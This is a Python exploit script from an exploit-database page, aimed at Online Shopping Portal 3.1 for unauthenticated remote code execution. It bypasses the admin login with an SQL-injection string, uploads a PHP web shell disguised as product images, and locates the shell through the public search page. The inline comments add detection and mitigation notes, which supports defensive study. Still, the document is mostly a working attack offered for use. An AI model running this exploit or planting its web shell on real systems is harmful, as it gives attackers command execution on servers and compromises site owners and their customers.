## https://sploitus.com/exploit?id=PACKETSTORM:163185
# Exploit Title: Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)  
# Date: 17.06.2021  
# Exploit Author: Tagoletta (Tağmaç)  
# Software Link: https://phpgurukul.com/shopping-portal-free-download/  
# Version: V3.1  
# Tested on: Windows & Ubuntu  
  
  
import requests  
import random  
import string  
  
  
# Hard-coded base URL of the Online Shopping Portal install under test
# (scheme, host, port and application path).
url = "http://192.168.1.3:80/shopping"  
# Body of the PHP file that gets uploaded: when its `cmd` query parameter is
# set, it runs that value through system() and echoes the output inside <pre>.
# For responders, this exact string is the on-disk indicator of a successful
# run (a .php file in the product-image directory), and a WAF/log rule can key
# on `system($cmd)` or on `.php` uploads to a form that only expects images.
payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"  
  
# One session so the admin login cookie is reused by the upload request below.
session = requests.session()  
  
print("logining")  
  
# Step 1 - authentication bypass on the admin login form. The username value is
# a classic SQL-injection string and the password is empty; this only works
# because the application builds its login query by string concatenation.
# Mitigation: prepared statements / parameterised queries and password
# verification independent of the SQL result. Detection: login POSTs whose
# username contains quote + OR / `--` comment sequences.
# NOTE: the response is never checked, so a failed login is not reported here;
# it only shows up later as the IndexError in the path-extraction step.
request_url = url+"/admin/"  
post_data = {"username": "' OR 1=1-- a", "password": '', "submit": ''}  
session.post(request_url, data=post_data)  
  
# Random 15-letter names for the product and for the uploaded file so the run
# does not collide with existing records and the file can be found again via
# the public search page.
let = string.ascii_lowercase  
shellname = ''.join(random.choice(let) for i in range(15))  
randstr = ''.join(random.choice(let) for i in range(15))  
  
print("product name is "+randstr)  
print("shell name is "+shellname)  
print("uploading payload")  
  
# Step 2 - unrestricted file upload via the admin "insert product" form.
# The multipart body is assembled by hand with a fixed boundary (the same
# boundary must appear in the Content-Type header, which is why the header is
# also set by hand). The three productimage fields all carry the PHP payload
# under a client-chosen `.php` filename; the script later assumes the server
# stored the file under that name in a web-served directory, i.e. no extension
# allow-list, no content sniffing and no server-side renaming.
# Mitigation: store uploads outside the web root or under a server-generated
# name, allow-list image extensions/MIME types, and disable script execution
# in the upload directory.
# `category`=80 / `subcategory`=8080 are presumably ids present in the
# default sample data - TODO confirm against the target's schema.
request_url = url+"/admin/insert-product.php"  
post_header = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryJNYN304wDTnp1QmE", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": url+"/admin/insert-product.php", "Accept-Encoding": "gzip, deflate", "Connection": "close"}  
post_data = "------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"category\"\r\n\r\n80\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"subcategory\"\r\n\r\n8080\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productName\"\r\n\r\n"+randstr+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productCompany\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productpricebd\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productprice\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productDescription\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productShippingcharge\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productAvailability\"\r\n\r\nIn Stock\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage1\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage2\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage3\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE--\r\n"  
# The upload response is also discarded; success is only inferred in step 3.
session.post(request_url, headers=post_header, data=post_data)  
  
# Step 3 - locate the stored file through the unauthenticated public search
# page. The search result HTML is expected to contain
# `data-echo="admin/productimages<shellpath><shellname>.php"`, and the text
# between those two markers is taken as the sub-path the server stored the
# upload under. Note `str(bytes)` yields a `b'...'` repr rather than decoded
# text; the split still works because both markers are ASCII. If the marker is
# absent (login or upload failed, or the product is not searchable) the `[1]`
# index raises IndexError. A plain `requests.post` (no session) is enough here
# because the search page needs no authentication.
request_url = url+"/search-result.php"  
post_data = {"product": randstr, "search": ''}  
shellpath = str(requests.post(request_url, data=post_data).content).split("data-echo=\"admin/productimages")[1].split(shellname+".php")[0]  
  
# Only reports the reconstructed location of the uploaded file; the script
# itself does not issue any `cmd` request.
print("\npath of shell= "+url+"/admin/productimages"+shellpath+shellname+".php")